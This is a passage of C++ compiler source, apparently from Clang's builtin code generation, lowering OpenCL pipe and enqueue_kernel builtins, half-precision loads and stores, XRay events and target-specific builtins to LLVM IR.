const char *Name = (BuiltinID == Builtin::BIread_pipe) ? "__read_pipe_2"
: "__write_pipe_2";
// Creating a generic function type to be able to call with any builtin or
// user defined type.
llvm::Type *ArgTys[] = {Arg0->getType(), I8PTy, Int32Ty, Int32Ty};
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
Value *BCast = Builder.CreatePointerCast(Arg1, I8PTy);
return RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, BCast, PacketSize, PacketAlign}));
} else {
assert(4 == E->getNumArgs() &&
"Illegal number of parameters to pipe function");
const char *Name = (BuiltinID == Builtin::BIread_pipe) ? "__read_pipe_4"
: "__write_pipe_4";
llvm::Type *ArgTys[] = {Arg0->getType(), Arg1->getType(), Int32Ty, I8PTy,
Int32Ty, Int32Ty};
Value *Arg2 = EmitScalarExpr(E->getArg(2)),
*Arg3 = EmitScalarExpr(E->getArg(3));
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
Value *BCast = Builder.CreatePointerCast(Arg3, I8PTy);
// We know the third argument is an integer type, but we may need to cast
// it to i32.
if (Arg2->getType() != Int32Ty)
Arg2 = Builder.CreateZExtOrTrunc(Arg2, Int32Ty);
return RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, Arg1, Arg2, BCast, PacketSize, PacketAlign}));
}
}
// OpenCL v2.0 s6.13.16, s9.17.3.5 - Built-in pipe reserve read and write
// functions
case Builtin::BIreserve_read_pipe:
case Builtin::BIreserve_write_pipe:
case Builtin::BIwork_group_reserve_read_pipe:
case Builtin::BIwork_group_reserve_write_pipe:
case Builtin::BIsub_group_reserve_read_pipe:
case Builtin::BIsub_group_reserve_write_pipe: {
// Composing the mangled name for the function.
const char *Name;
if (BuiltinID == Builtin::BIreserve_read_pipe)
Name = "__reserve_read_pipe";
else if (BuiltinID == Builtin::BIreserve_write_pipe)
Name = "__reserve_write_pipe";
else if (BuiltinID == Builtin::BIwork_group_reserve_read_pipe)
Name = "__work_group_reserve_read_pipe";
else if (BuiltinID == Builtin::BIwork_group_reserve_write_pipe)
Name = "__work_group_reserve_write_pipe";
else if (BuiltinID == Builtin::BIsub_group_reserve_read_pipe)
Name = "__sub_group_reserve_read_pipe";
else
Name = "__sub_group_reserve_write_pipe";
Value *Arg0 = EmitScalarExpr(E->getArg(0)),
*Arg1 = EmitScalarExpr(E->getArg(1));
llvm::Type *ReservedIDTy = ConvertType(getContext().OCLReserveIDTy);
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
// Building the generic function prototype.
llvm::Type *ArgTys[] = {Arg0->getType(), Int32Ty, Int32Ty, Int32Ty};
llvm::FunctionType *FTy = llvm::FunctionType::get(
ReservedIDTy, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
// We know the second argument is an integer type, but we may need to cast
// it to i32.
if (Arg1->getType() != Int32Ty)
Arg1 = Builder.CreateZExtOrTrunc(Arg1, Int32Ty);
return RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, Arg1, PacketSize, PacketAlign}));
}
// OpenCL v2.0 s6.13.16, s9.17.3.5 - Built-in pipe commit read and write
// functions
case Builtin::BIcommit_read_pipe:
case Builtin::BIcommit_write_pipe:
case Builtin::BIwork_group_commit_read_pipe:
case Builtin::BIwork_group_commit_write_pipe:
case Builtin::BIsub_group_commit_read_pipe:
case Builtin::BIsub_group_commit_write_pipe: {
const char *Name;
if (BuiltinID == Builtin::BIcommit_read_pipe)
Name = "__commit_read_pipe";
else if (BuiltinID == Builtin::BIcommit_write_pipe)
Name = "__commit_write_pipe";
else if (BuiltinID == Builtin::BIwork_group_commit_read_pipe)
Name = "__work_group_commit_read_pipe";
else if (BuiltinID == Builtin::BIwork_group_commit_write_pipe)
Name = "__work_group_commit_write_pipe";
else if (BuiltinID == Builtin::BIsub_group_commit_read_pipe)
Name = "__sub_group_commit_read_pipe";
else
Name = "__sub_group_commit_write_pipe";
Value *Arg0 = EmitScalarExpr(E->getArg(0)),
*Arg1 = EmitScalarExpr(E->getArg(1));
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
// Building the generic function prototype.
llvm::Type *ArgTys[] = {Arg0->getType(), Arg1->getType(), Int32Ty, Int32Ty};
llvm::FunctionType *FTy =
llvm::FunctionType::get(llvm::Type::getVoidTy(getLLVMContext()),
llvm::ArrayRef<llvm::Type *>(ArgTys), false);
return RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, Arg1, PacketSize, PacketAlign}));
}
// OpenCL v2.0 s6.13.16.4 Built-in pipe query functions
case Builtin::BIget_pipe_num_packets:
case Builtin::BIget_pipe_max_packets: {
const char *BaseName;
const auto *PipeTy = E->getArg(0)->getType()->castAs<PipeType>();
if (BuiltinID == Builtin::BIget_pipe_num_packets)
BaseName = "__get_pipe_num_packets";
else
BaseName = "__get_pipe_max_packets";
std::string Name = std::string(BaseName) +
std::string(PipeTy->isReadOnly() ? "_ro" : "_wo");
// Building the generic function prototype.
Value *Arg0 = EmitScalarExpr(E->getArg(0));
CGOpenCLRuntime OpenCLRT(CGM);
Value *PacketSize = OpenCLRT.getPipeElemSize(E->getArg(0));
Value *PacketAlign = OpenCLRT.getPipeElemAlign(E->getArg(0));
llvm::Type *ArgTys[] = {Arg0->getType(), Int32Ty, Int32Ty};
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
return RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
{Arg0, PacketSize, PacketAlign}));
}
// OpenCL v2.0 s6.13.9 - Address space qualifier functions.
case Builtin::BIto_global:
case Builtin::BIto_local:
case Builtin::BIto_private: {
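// Lower to the runtime functions __to_global/__to_local/__to_private
// (derived below as "__" + the callee name), which take a generic
// pointer and, per the OpenCL v2.0 spec, return null when the pointer
// does not actually point into the requested address space.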
auto Arg0 = EmitScalarExpr(E->getArg(0));
auto NewArgT = llvm::PointerType::get(Int8Ty,
CGM.getContext().getTargetAddressSpace(LangAS::opencl_generic));
auto NewRetT = llvm::PointerType::get(Int8Ty,
CGM.getContext().getTargetAddressSpace(
E->getType()->getPointeeType().getAddressSpace()));
auto FTy = llvm::FunctionType::get(NewRetT, {NewArgT}, false);
llvm::Value *NewArg;
if (Arg0->getType()->getPointerAddressSpace() !=
NewArgT->getPointerAddressSpace())
NewArg = Builder.CreateAddrSpaceCast(Arg0, NewArgT);
else
NewArg = Builder.CreateBitOrPointerCast(Arg0, NewArgT);
auto NewName = std::string("__") + E->getDirectCallee()->getName().str();
auto NewCall =
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, NewName), {NewArg});
return RValue::get(Builder.CreateBitOrPointerCast(NewCall,
ConvertType(E->getType())));
}
// OpenCL v2.0, s6.13.17 - Enqueue kernel function.
// It contains four different overload formats specified in Table 6.13.17.1.
case Builtin::BIenqueue_kernel: {
StringRef Name; // Generated function call name
unsigned NumArgs = E->getNumArgs();
llvm::Type *QueueTy = ConvertType(getContext().OCLQueueTy);
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
llvm::Value *Queue = EmitScalarExpr(E->getArg(0));
llvm::Value *Flags = EmitScalarExpr(E->getArg(1));
LValue NDRangeL = EmitAggExprToLValue(E->getArg(2));
llvm::Value *Range = NDRangeL.getAddress(*this).getPointer();
llvm::Type *RangeTy = NDRangeL.getAddress(*this).getType();
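// Dispatch on the argument count: 4 args is the basic form, a block
// pointer at position 3 means varargs without events, and 7 or more
// args means events (with optional varargs). See Table 6.13.17.1.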
if (NumArgs == 4) {
// The most basic form of the call with parameters:
// queue_t, kernel_enqueue_flags_t, ndrange_t, block(void)
Name = "__enqueue_kernel_basic";
llvm::Type *ArgTys[] = {QueueTy, Int32Ty, RangeTy, GenericVoidPtrTy,
GenericVoidPtrTy};
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(3));
llvm::Value *Kernel =
Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
llvm::Value *Block =
Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
AttrBuilder B;
B.addByValAttr(NDRangeL.getAddress(*this).getElementType());
llvm::AttributeList ByValAttrSet =
llvm::AttributeList::get(CGM.getModule().getContext(), 3U, B);
auto RTCall =
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name, ByValAttrSet),
{Queue, Flags, Range, Kernel, Block});
RTCall->setAttributes(ByValAttrSet);
return RValue::get(RTCall);
}
assert(NumArgs >= 5 && "Invalid enqueue_kernel signature");
// Create a temporary array to hold the sizes of local pointer arguments
// for the block. \p First is the position of the first size argument.
auto CreateArrayForSizeVar = [=](unsigned First)
-> std::tuple<llvm::Value *, llvm::Value *, llvm::Value *> {
llvm::APInt ArraySize(32, NumArgs - First);
QualType SizeArrayTy = getContext().getConstantArrayType(
getContext().getSizeType(), ArraySize, nullptr, ArrayType::Normal,
/*IndexTypeQuals=*/0);
auto Tmp = CreateMemTemp(SizeArrayTy, "block_sizes");
llvm::Value *TmpPtr = Tmp.getPointer();
llvm::Value *TmpSize = EmitLifetimeStart(
CGM.getDataLayout().getTypeAllocSize(Tmp.getElementType()), TmpPtr);
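// TmpSize is null when lifetime markers are disabled; the callers
// guard the matching EmitLifetimeEnd on it.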
llvm::Value *ElemPtr;
// Each of the following arguments specifies the size of the corresponding
// argument passed to the enqueued block.
auto *Zero = llvm::ConstantInt::get(IntTy, 0);
for (unsigned I = First; I < NumArgs; ++I) {
auto *Index = llvm::ConstantInt::get(IntTy, I - First);
auto *GEP = Builder.CreateGEP(Tmp.getElementType(), TmpPtr,
{Zero, Index});
if (I == First)
ElemPtr = GEP;
auto *V =
Builder.CreateZExtOrTrunc(EmitScalarExpr(E->getArg(I)), SizeTy);
Builder.CreateAlignedStore(
V, GEP, CGM.getDataLayout().getPrefTypeAlign(SizeTy));
}
return std::tie(ElemPtr, TmpSize, TmpPtr);
};
// Could have events and/or varargs.
if (E->getArg(3)->getType()->isBlockPointerType()) {
// No events passed, but has variadic arguments.
Name = "__enqueue_kernel_varargs";
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(3));
llvm::Value *Kernel =
Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
auto *Block = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
llvm::Value *ElemPtr, *TmpSize, *TmpPtr;
std::tie(ElemPtr, TmpSize, TmpPtr) = CreateArrayForSizeVar(4);
// Create a vector of the arguments, as well as a constant value to
// express to the runtime the number of variadic arguments.
llvm::Value *const Args[] = {Queue, Flags,
Range, Kernel,
Block, ConstantInt::get(IntTy, NumArgs - 4),
ElemPtr};
llvm::Type *const ArgTys[] = {
QueueTy, IntTy, RangeTy, GenericVoidPtrTy,
GenericVoidPtrTy, IntTy, ElemPtr->getType()};
llvm::FunctionType *FTy = llvm::FunctionType::get(Int32Ty, ArgTys, false);
auto Call = RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name), Args));
if (TmpSize)
EmitLifetimeEnd(TmpSize, TmpPtr);
return Call;
}
// Any calls now have event arguments passed.
if (NumArgs >= 7) {
llvm::Type *EventTy = ConvertType(getContext().OCLClkEventTy);
llvm::PointerType *EventPtrTy = EventTy->getPointerTo(
CGM.getContext().getTargetAddressSpace(LangAS::opencl_generic));
llvm::Value *NumEvents =
Builder.CreateZExtOrTrunc(EmitScalarExpr(E->getArg(3)), Int32Ty);
// Since SemaOpenCLBuiltinEnqueueKernel allows fifth and sixth arguments
// to be a null pointer constant (including `0` literal), we can take it
// into account and emit null pointer directly.
llvm::Value *EventWaitList = nullptr;
if (E->getArg(4)->isNullPointerConstant(
getContext(), Expr::NPC_ValueDependentIsNotNull)) {
EventWaitList = llvm::ConstantPointerNull::get(EventPtrTy);
} else {
EventWaitList = E->getArg(4)->getType()->isArrayType()
? EmitArrayToPointerDecay(E->getArg(4)).getPointer()
: EmitScalarExpr(E->getArg(4));
// Convert to generic address space.
EventWaitList = Builder.CreatePointerCast(EventWaitList, EventPtrTy);
}
llvm::Value *EventRet = nullptr;
if (E->getArg(5)->isNullPointerConstant(
getContext(), Expr::NPC_ValueDependentIsNotNull)) {
EventRet = llvm::ConstantPointerNull::get(EventPtrTy);
} else {
EventRet =
Builder.CreatePointerCast(EmitScalarExpr(E->getArg(5)), EventPtrTy);
}
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(6));
llvm::Value *Kernel =
Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
llvm::Value *Block =
Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
std::vector<llvm::Type *> ArgTys = {
QueueTy, Int32Ty, RangeTy, Int32Ty,
EventPtrTy, EventPtrTy, GenericVoidPtrTy, GenericVoidPtrTy};
std::vector<llvm::Value *> Args = {Queue, Flags, Range,
NumEvents, EventWaitList, EventRet,
Kernel, Block};
if (NumArgs == 7) {
// Has events but no variadics.
Name = "__enqueue_kernel_basic_events";
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
return RValue::get(
EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
llvm::ArrayRef<llvm::Value *>(Args)));
}
// Has event info and variadics.
// Pass the number of variadics to the runtime function too.
Args.push_back(ConstantInt::get(Int32Ty, NumArgs - 7));
ArgTys.push_back(Int32Ty);
Name = "__enqueue_kernel_events_varargs";
llvm::Value *ElemPtr, *TmpSize, *TmpPtr;
std::tie(ElemPtr, TmpSize, TmpPtr) = CreateArrayForSizeVar(7);
Args.push_back(ElemPtr);
ArgTys.push_back(ElemPtr->getType());
llvm::FunctionType *FTy = llvm::FunctionType::get(
Int32Ty, llvm::ArrayRef<llvm::Type *>(ArgTys), false);
auto Call =
RValue::get(EmitRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name),
llvm::ArrayRef<llvm::Value *>(Args)));
if (TmpSize)
EmitLifetimeEnd(TmpSize, TmpPtr);
return Call;
}
LLVM_FALLTHROUGH;
}
// OpenCL v2.0 s6.13.17.6 - Kernel query functions need bitcast of block
// parameter.
case Builtin::BIget_kernel_work_group_size: {
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(0));
Value *Kernel = Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
Value *Arg = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
return RValue::get(EmitRuntimeCall(
CGM.CreateRuntimeFunction(
llvm::FunctionType::get(IntTy, {GenericVoidPtrTy, GenericVoidPtrTy},
false),
"__get_kernel_work_group_size_impl"),
{Kernel, Arg}));
}
case Builtin::BIget_kernel_preferred_work_group_size_multiple: {
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(0));
Value *Kernel = Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
Value *Arg = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
return RValue::get(EmitRuntimeCall(
CGM.CreateRuntimeFunction(
llvm::FunctionType::get(IntTy, {GenericVoidPtrTy, GenericVoidPtrTy},
false),
"__get_kernel_preferred_work_group_size_multiple_impl"),
{Kernel, Arg}));
}
case Builtin::BIget_kernel_max_sub_group_size_for_ndrange:
case Builtin::BIget_kernel_sub_group_count_for_ndrange: {
llvm::Type *GenericVoidPtrTy = Builder.getInt8PtrTy(
getContext().getTargetAddressSpace(LangAS::opencl_generic));
LValue NDRangeL = EmitAggExprToLValue(E->getArg(0));
llvm::Value *NDRange = NDRangeL.getAddress(*this).getPointer();
auto Info =
CGM.getOpenCLRuntime().emitOpenCLEnqueuedBlock(*this, E->getArg(1));
Value *Kernel = Builder.CreatePointerCast(Info.Kernel, GenericVoidPtrTy);
Value *Block = Builder.CreatePointerCast(Info.BlockArg, GenericVoidPtrTy);
const char *Name =
BuiltinID == Builtin::BIget_kernel_max_sub_group_size_for_ndrange
? "__get_kernel_max_sub_group_size_for_ndrange_impl"
: "__get_kernel_sub_group_count_for_ndrange_impl";
return RValue::get(EmitRuntimeCall(
CGM.CreateRuntimeFunction(
llvm::FunctionType::get(
IntTy, {NDRange->getType(), GenericVoidPtrTy, GenericVoidPtrTy},
false),
Name),
{NDRange, Kernel, Block}));
}
case Builtin::BI__builtin_store_half:
case Builtin::BI__builtin_store_halff: {
Value *Val = EmitScalarExpr(E->getArg(0));
Address Address = EmitPointerWithAlignment(E->getArg(1));
Value *HalfVal = Builder.CreateFPTrunc(Val, Builder.getHalfTy());
return RValue::get(Builder.CreateStore(HalfVal, Address));
}
case Builtin::BI__builtin_load_half: {
Address Address = EmitPointerWithAlignment(E->getArg(0));
Value *HalfVal = Builder.CreateLoad(Address);
return RValue::get(Builder.CreateFPExt(HalfVal, Builder.getDoubleTy()));
}
case Builtin::BI__builtin_load_halff: {
Address Address = EmitPointerWithAlignment(E->getArg(0));
Value *HalfVal = Builder.CreateLoad(Address);
return RValue::get(Builder.CreateFPExt(HalfVal, Builder.getFloatTy()));
}
case Builtin::BIprintf:
if (getTarget().getTriple().isNVPTX() ||
getTarget().getTriple().isAMDGCN()) {
if (getLangOpts().OpenMPIsDevice)
return EmitOpenMPDevicePrintfCallExpr(E);
if (getTarget().getTriple().isNVPTX())
return EmitNVPTXDevicePrintfCallExpr(E);
if (getTarget().getTriple().isAMDGCN() && getLangOpts().HIP)
return EmitAMDGPUDevicePrintfCallExpr(E);
}
break;
case Builtin::BI__builtin_canonicalize:
case Builtin::BI__builtin_canonicalizef:
case Builtin::BI__builtin_canonicalizef16:
case Builtin::BI__builtin_canonicalizel:
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::canonicalize));
case Builtin::BI__builtin_thread_pointer: {
if (!getContext().getTargetInfo().isTLSSupported())
CGM.ErrorUnsupported(E, "__builtin_thread_pointer");
// Fall through - it's already mapped to the intrinsic by GCCBuiltin.
break;
}
case Builtin::BI__builtin_os_log_format:
return emitBuiltinOSLogFormat(*E);
case Builtin::BI__xray_customevent: {
if (!ShouldXRayInstrumentFunction())
return RValue::getIgnored();
if (!CGM.getCodeGenOpts().XRayInstrumentationBundle.has(
XRayInstrKind::Custom))
return RValue::getIgnored();
if (const auto *XRayAttr = CurFuncDecl->getAttr<XRayInstrumentAttr>())
if (XRayAttr->neverXRayInstrument() && !AlwaysEmitXRayCustomEvents())
return RValue::getIgnored();
Function *F = CGM.getIntrinsic(Intrinsic::xray_customevent);
auto FTy = F->getFunctionType();
auto Arg0 = E->getArg(0);
auto Arg0Val = EmitScalarExpr(Arg0);
auto Arg0Ty = Arg0->getType();
auto PTy0 = FTy->getParamType(0);
if (PTy0 != Arg0Val->getType()) {
if (Arg0Ty->isArrayType())
Arg0Val = EmitArrayToPointerDecay(Arg0).getPointer();
else
Arg0Val = Builder.CreatePointerCast(Arg0Val, PTy0);
}
auto Arg1 = EmitScalarExpr(E->getArg(1));
auto PTy1 = FTy->getParamType(1);
if (PTy1 != Arg1->getType())
Arg1 = Builder.CreateTruncOrBitCast(Arg1, PTy1);
return RValue::get(Builder.CreateCall(F, {Arg0Val, Arg1}));
}
case Builtin::BI__xray_typedevent: {
// TODO: There should be a way to always emit events even if the current
// function is not instrumented. Losing events in a stream can cripple
// a trace.
if (!ShouldXRayInstrumentFunction())
return RValue::getIgnored();
if (!CGM.getCodeGenOpts().XRayInstrumentationBundle.has(
XRayInstrKind::Typed))
return RValue::getIgnored();
if (const auto *XRayAttr = CurFuncDecl->getAttr<XRayInstrumentAttr>())
if (XRayAttr->neverXRayInstrument() && !AlwaysEmitXRayTypedEvents())
return RValue::getIgnored();
Function *F = CGM.getIntrinsic(Intrinsic::xray_typedevent);
auto FTy = F->getFunctionType();
auto Arg0 = EmitScalarExpr(E->getArg(0));
auto PTy0 = FTy->getParamType(0);
if (PTy0 != Arg0->getType())
Arg0 = Builder.CreateTruncOrBitCast(Arg0, PTy0);
auto Arg1 = E->getArg(1);
auto Arg1Val = EmitScalarExpr(Arg1);
auto Arg1Ty = Arg1->getType();
auto PTy1 = FTy->getParamType(1);
if (PTy1 != Arg1Val->getType()) {
if (Arg1Ty->isArrayType())
Arg1Val = EmitArrayToPointerDecay(Arg1).getPointer();
else
Arg1Val = Builder.CreatePointerCast(Arg1Val, PTy1);
}
auto Arg2 = EmitScalarExpr(E->getArg(2));
auto PTy2 = FTy->getParamType(2);
if (PTy2 != Arg2->getType())
Arg2 = Builder.CreateTruncOrBitCast(Arg2, PTy2);
return RValue::get(Builder.CreateCall(F, {Arg0, Arg1Val, Arg2}));
}
case Builtin::BI__builtin_ms_va_start:
case Builtin::BI__builtin_ms_va_end:
return RValue::get(
EmitVAStartEnd(EmitMSVAListRef(E->getArg(0)).getPointer(),
BuiltinID == Builtin::BI__builtin_ms_va_start));
case Builtin::BI__builtin_ms_va_copy: {
// Lower this manually. We can't reliably determine whether or not any
// given va_copy() is for a Win64 va_list from the calling convention
// alone, because it's legal to do this from a System V ABI function.
// With opaque pointer types, we won't have enough information in LLVM
// IR to determine this from the argument types, either. Best to do it
// now, while we have enough information.
Address DestAddr = EmitMSVAListRef(E->getArg(0));
Address SrcAddr = EmitMSVAListRef(E->getArg(1));
llvm::Type *BPP = Int8PtrPtrTy;
DestAddr = Address(Builder.CreateBitCast(DestAddr.getPointer(), BPP, "cp"),
DestAddr.getAlignment());
SrcAddr = Address(Builder.CreateBitCast(SrcAddr.getPointer(), BPP, "ap"),
SrcAddr.getAlignment());
Value *ArgPtr = Builder.CreateLoad(SrcAddr, "ap.val");
return RValue::get(Builder.CreateStore(ArgPtr, DestAddr));
}
// SYCL
case Builtin::BI__builtin_intel_fpga_reg:
return EmitIntelFPGARegBuiltin(E, ReturnValue);
case Builtin::BI__builtin_intel_fpga_mem:
return EmitIntelFPGAMemBuiltin(E);
case Builtin::BI__builtin_get_device_side_mangled_name: {
auto Name = CGM.getCUDARuntime().getDeviceSideName(
cast<DeclRefExpr>(E->getArg(0)->IgnoreImpCasts())->getDecl());
auto Str = CGM.GetAddrOfConstantCString(Name, "");
llvm::Constant *Zeros[] = {llvm::ConstantInt::get(SizeTy, 0),
llvm::ConstantInt::get(SizeTy, 0)};
auto *Ptr = llvm::ConstantExpr::getGetElementPtr(Str.getElementType(),
Str.getPointer(), Zeros);
return RValue::get(Ptr);
}
}
// If this is an alias for a lib function (e.g. __builtin_sin), emit
// the call using the normal call path, but using the unmangled
// version of the function name.
if (getContext().BuiltinInfo.isLibFunction(BuiltinID))
return emitLibraryCall(*this, FD, E,
CGM.getBuiltinLibFunction(FD, BuiltinID));
// If this is a predefined lib function (e.g. malloc), emit the call
// using exactly the normal call path.
if (getContext().BuiltinInfo.isPredefinedLibFunction(BuiltinID))
return emitLibraryCall(*this, FD, E,
cast<llvm::Constant>(EmitScalarExpr(E->getCallee())));
// Check that a call to a target specific builtin has the correct target
// features.
// This is down here to avoid non-target specific builtins, however, if
// generic builtins start to require generic target features then we
// can move this up to the beginning of the function.
checkTargetFeatures(E, FD);
if (unsigned VectorWidth = getContext().BuiltinInfo.getRequiredVectorWidth(BuiltinID))
LargestVectorWidth = std::max(LargestVectorWidth, VectorWidth);
// See if we have a target specific intrinsic.
const char *Name = getContext().BuiltinInfo.getName(BuiltinID);
Intrinsic::ID IntrinsicID = Intrinsic::not_intrinsic;
StringRef Prefix =
llvm::Triple::getArchTypePrefix(getTarget().getTriple().getArch());
if (!Prefix.empty()) {
IntrinsicID = Intrinsic::getIntrinsicForGCCBuiltin(Prefix.data(), Name);
// NOTE: we don't need to perform a compatibility flag check here since
// the MS builtins are declared in Builtins*.def via LANGBUILTIN with
// ALL_MS_LANGUAGES and have already been filtered out earlier.
if (IntrinsicID == Intrinsic::not_intrinsic)
IntrinsicID = Intrinsic::getIntrinsicForMSBuiltin(Prefix.data(), Name);
}
if (IntrinsicID != Intrinsic::not_intrinsic) {
SmallVector<Value*, 16> Args;
// Find out if any arguments are required to be integer constant
// expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
Function *F = CGM.getIntrinsic(IntrinsicID);
llvm::FunctionType *FTy = F->getFunctionType();
for (unsigned i = 0, e = E->getNumArgs(); i != e; ++i) {
Value *ArgValue;
// If this is a normal argument, just emit it as a scalar.
if ((ICEArguments & (1 << i)) == 0) {
ArgValue = EmitScalarExpr(E->getArg(i));
} else {
// If this is required to be a constant, constant fold it so that we
// know that the generated intrinsic gets a ConstantInt.
ArgValue = llvm::ConstantInt::get(
getLLVMContext(),
*E->getArg(i)->getIntegerConstantExpr(getContext()));
}
// If the intrinsic arg type is different from the builtin arg type
// we need to do a bit cast.
llvm::Type *PTy = FTy->getParamType(i);
if (PTy != ArgValue->getType()) {
// XXX - vector of pointers?
if (auto *PtrTy = dyn_cast<llvm::PointerType>(PTy)) {
if (PtrTy->getAddressSpace() !=
ArgValue->getType()->getPointerAddressSpace()) {
ArgValue = Builder.CreateAddrSpaceCast(
ArgValue,
ArgValue->getType()->getPointerTo(PtrTy->getAddressSpace()));
}
}
assert(ArgValue->getType()->canLosslesslyBitCastTo(PTy) &&
"Must be able to losslessly bit cast to param");
ArgValue = Builder.CreateBitCast(ArgValue, PTy);
}
Args.push_back(ArgValue);
}
Value *V = Builder.CreateCall(F, Args);
QualType BuiltinRetType = E->getType();
llvm::Type *RetTy = VoidTy;
if (!BuiltinRetType->isVoidType())
RetTy = ConvertType(BuiltinRetType);
if (RetTy != V->getType()) {
// XXX - vector of pointers?
if (auto *PtrTy = dyn_cast<llvm::PointerType>(RetTy)) {
if (PtrTy->getAddressSpace() != V->getType()->getPointerAddressSpace()) {
V = Builder.CreateAddrSpaceCast(
V, V->getType()->getPointerTo(PtrTy->getAddressSpace()));
}
}
assert(V->getType()->canLosslesslyBitCastTo(RetTy) &&
"Must be able to losslessly bit cast result type");
V = Builder.CreateBitCast(V, RetTy);
}
return RValue::get(V);
}
// Some target-specific builtins can have aggregate return values, e.g.
// __builtin_arm_mve_vld2q_u32. So if the result is an aggregate, force
// ReturnValue to be non-null, so that the target-specific emission code can
// always just emit into it.
TypeEvaluationKind EvalKind = getEvaluationKind(E->getType());
if (EvalKind == TEK_Aggregate && ReturnValue.isNull()) {
Address DestPtr = CreateMemTemp(E->getType(), "agg.tmp");
ReturnValue = ReturnValueSlot(DestPtr, false);
}
// Now see if we can emit a target-specific builtin.
if (Value *V = EmitTargetBuiltinExpr(BuiltinID, E, ReturnValue)) {
switch (EvalKind) {
case TEK_Scalar:
return RValue::get(V);
case TEK_Aggregate:
return RValue::getAggregate(ReturnValue.getValue(),
ReturnValue.isVolatile());
case TEK_Complex:
llvm_unreachable("No current target builtin returns complex");
}
llvm_unreachable("Bad evaluation kind in EmitBuiltinExpr");
}
ErrorUnsupported(E, "builtin function");
// Unknown builtin, for now just dump it out and return undef.
return GetUndefRValue(E->getType());
}
static Value *EmitTargetArchBuiltinExpr(CodeGenFunction *CGF,
unsigned BuiltinID, const CallExpr *E,
ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
switch (Arch) {
case llvm::Triple::arm:
case llvm::Triple::armeb:
case llvm::Triple::thumb:
case llvm::Triple::thumbeb:
return CGF->EmitARMBuiltinExpr(BuiltinID, E, ReturnValue, Arch);
case llvm::Triple::aarch64:
case llvm::Triple::aarch64_32:
case llvm::Triple::aarch64_be:
return CGF->EmitAArch64BuiltinExpr(BuiltinID, E, Arch);
case llvm::Triple::bpfeb:
case llvm::Triple::bpfel:
return CGF->EmitBPFBuiltinExpr(BuiltinID, E);
case llvm::Triple::x86:
case llvm::Triple::x86_64:
return CGF->EmitX86BuiltinExpr(BuiltinID, E);
case llvm::Triple::ppc:
case llvm::Triple::ppcle:
case llvm::Triple::ppc64:
case llvm::Triple::ppc64le:
return CGF->EmitPPCBuiltinExpr(BuiltinID, E);
case llvm::Triple::r600:
case llvm::Triple::amdgcn:
return CGF->EmitAMDGPUBuiltinExpr(BuiltinID, E);
case llvm::Triple::systemz:
return CGF->EmitSystemZBuiltinExpr(BuiltinID, E);
case llvm::Triple::nvptx:
case llvm::Triple::nvptx64:
return CGF->EmitNVPTXBuiltinExpr(BuiltinID, E);
case llvm::Triple::wasm32:
case llvm::Triple::wasm64:
return CGF->EmitWebAssemblyBuiltinExpr(BuiltinID, E);
case llvm::Triple::hexagon:
return CGF->EmitHexagonBuiltinExpr(BuiltinID, E);
case llvm::Triple::riscv32:
case llvm::Triple::riscv64:
return CGF->EmitRISCVBuiltinExpr(BuiltinID, E, ReturnValue);
default:
return nullptr;
}
}
Value *CodeGenFunction::EmitTargetBuiltinExpr(unsigned BuiltinID,
